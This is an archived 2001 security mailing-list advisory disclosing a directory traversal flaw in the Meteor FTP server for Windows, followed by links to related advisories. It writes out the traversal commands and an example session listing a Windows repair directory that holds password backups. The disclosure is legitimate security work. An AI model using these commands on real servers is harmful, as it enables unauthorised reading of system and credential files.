[NT] Meteor FTPD Directory Traversal

From: support@securiteam.com
Date: 10/03/01

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Meteor FTPD Directory Traversal
Date: Wed,  3 Oct 2001 23:38:27 +0200 (CEST)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Meteor FTPD Directory Traversal

SUMMARY

 <http://207.202.218.172/> Meteor FTP is a personal FTP server designed
for the Microsoft Windows 98 and Windows Millennium Edition operating
systems. A security vulnerability in the product allows access to
directories stored outside the normal bounding FTP root.

DETAILS

Cartel security team has found a Directory Traversal bug in the meteor FTP
server, allowing remote users to browse through any directory on the
victim's hard drive or list files outside the root directory. This is
possible by sending commands like:
ls ../*
ls /../*
ls .../*

cd ...

Example:
220 Service ready for new user Utilisateur (192.168.160.3:(none)) : nbz
331 User name okay, need password
Mot de passe :
230- Meteor FTP Version 1.0
230 User logged in, proceed
ftp> ls ../winnt/repair/*
200 Command OK
150 About to open data connection

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] Meteor FTP Denial of Service (MKD, STOR)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Meteor FTP is a personal FTP server designed ... After a successful logon to the server, ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] SalesCart Database Storage Insecurity
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... struct sockaddr_in sin; ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Keene Digital Media Server Directory Traversal
    ... Get your security news from a reliable source. ... Keene Digital Media Server is "an easy and ... A directory traversal is possible on the DMS due to a problem in the way ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] OS SIM - Security Infrastructure Monitor
    ... Get your security news from a reliable source. ... Infrastructure Monitor) able to integrate, ... level and low level security and network events which is able to compete ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] Cisco Security Agent DoS Vulnerability
    ... Get your security news from a reliable source. ... A malicious attacker may be able to send a crafted IP packet to a Windows ... * Cisco CSA maintenance version 4.5.1.616 ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)